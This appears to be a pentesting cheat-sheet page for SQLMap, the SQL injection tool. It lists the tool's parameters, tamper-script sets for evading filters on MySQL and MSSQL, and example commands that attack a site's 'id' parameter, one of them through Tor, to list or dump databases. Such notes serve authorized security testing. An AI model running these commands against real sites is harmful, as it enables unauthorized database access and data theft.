pwny.cc
Search…
SQLMap
GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
GitHub
SQLMap - Automatic SQL injection and database takeover tool

SQLMap parameters

1
-u: URL to attack
2
-r: Request file
3
-p: Parameter to
4
-v: Verbosity level (0-6, default 1
5
--proxy: Use a proxy to connect to target URL
6
--tor: Use Tor anonymity network
7
--random-agent: Use a random user agent
8
--level: Level of tests to perform (1-5, default 1)
9
--risk: Risk of tests to perform (1-3, default 1)
10
--batch: Never ask for user input, use the default behavior
11
--is-dba: Check if user is DBA admin
12
--tamper: Select one or multiple tampers to use
13
--dbms: Force back-end DBMS to provided value
14
--flush-session: Flush session files for current target
15
--technique: SQL Injection techniques to use (default "BEUSTQ")
16
B: Boolean-based blind
17
E: Error-based blind
18
U: Union query-based
19
S: Stacked queries
20
T: Time-based blind
21
Q: Inline queries
22
--dbs: Check for available DBs
23
--tables: Check tables for a selected DB
24
--dump: Dump a selected table
25
-D: Select a DB
26
-T: Select a table
Copied!
Not recommended to use all at the same time

General purpose

1
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
Copied!

MySQL

1
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
Copied!

MSSQL

1
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
Copied!

Usage examples

1
#Attack to 'id' parameter using request file forcing to MySQL back-end. List databases
2
sqlmap -r request -p id --batch --level 5 --risk 2 --dbms=MySQL --dbs
3
4
#Attack to 'id' parameter of 'http://web.com' URL using Tor network. List tables of 'Users' database
5
sqlmap -u https://web.com/user?id=1 --batch --tor -D Users --tables
6
7
#Attack to 'position' parameter of 'http://web.com' URL using three tampers. List databases
8
sqlmap -u https://web.com/user?id=1&position=100 -p position --batch --dbs --tamper=between,charencode,space2comment
Copied!